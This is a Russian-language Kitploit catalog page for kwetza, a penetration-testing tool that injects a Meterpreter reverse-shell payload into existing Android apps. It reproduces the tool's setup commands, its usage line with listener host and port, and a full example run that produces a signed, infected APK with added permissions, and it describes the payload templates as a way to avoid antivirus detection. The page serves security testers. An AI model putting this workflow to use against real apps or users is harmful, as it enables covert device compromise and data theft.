Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
kwetza — Скрипт на Python для внедрения полезной нагрузки Meterpreter в существующие приложения Android. | Kitploit
Инструменты/GitHubGitHub/sensepost/kwetza
Безопасность AndroidГенерация полезной нагрузкиЭксплуатацияПентестинг мобильных приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubsensepost/kwetza

kwetza

Скрипт на Python для внедрения полезной нагрузки Meterpreter в существующие приложения Android.

Репозиторий
6442398 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Введение

Arsenal

Автор: Chris Le Roy (@brompwnie) [email protected]

Kwetza — это инструмент, позволяющий заразить существующее Android-приложение полезной нагрузкой Meterpreter.

Что он делает?

Kwetza заражает существующее Android-приложение, используя пользовательские или стандартные шаблоны полезных нагрузок, чтобы избежать обнаружения антивирусами. Kwetza позволяет заражать Android-приложения, используя стандартные разрешения целевого приложения или внедряя дополнительные разрешения для получения расширенной функциональности.

Где можно найти статью в блоге?

Ручные шаги, автоматизированные Kwetza, описаны здесь: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

Получение кода

Сначала получите код:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza написан на Python и требует BeautifulSoup, который можно установить с помощью Pip:

root@kitploit:~
pip install beautifulsoup4

Kwetza требует, чтобы Apktool был установлен и доступен через ваш PATH. Это можно настроить с помощью инструкций по установке, расположенных здесь: https://ibotpeaches.github.io/Apktool/install

Использование

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = имя APK-файла, который вы хотите заразить.
  • https/tcp = выберите HTTPS или TCP-соединение.
  • LHOST = IP-адрес вашего слушателя.
  • LPORT = порт вашего слушателя.
  • yes = укажите "yes", чтобы внедрить дополнительные «зловредные» разрешения в приложение, "no" — чтобы использовать стандартные разрешения приложения.
  • customClass = укажите здесь пользовательскую активность, если хотите, чтобы Kwetza внедрилась в эту активность.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Информация

Kwetza разработан для работы с Python 2.

По умолчанию Kwetza использует шаблон и хранилище ключей, расположенные в папке "payload", для внедрения и подписи заражённого APK.

Если вы хотите подписать заражённое приложение собственным сертификатом, создайте новое хранилище ключей, поместите его в папку "payload" и переименуйте в уже существующее хранилище или измените ссылку в kwetza.py.

То же самое можно сделать и для шаблонов полезных нагрузок.

Пароль для хранилища ключей по умолчанию — "password".

Лицензия

Kwetza распространяется по лицензии Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).

Разрешения, выходящие за рамки этой лицензии, можно получить по адресу http://sensepost.com/contact

Скачать инструмент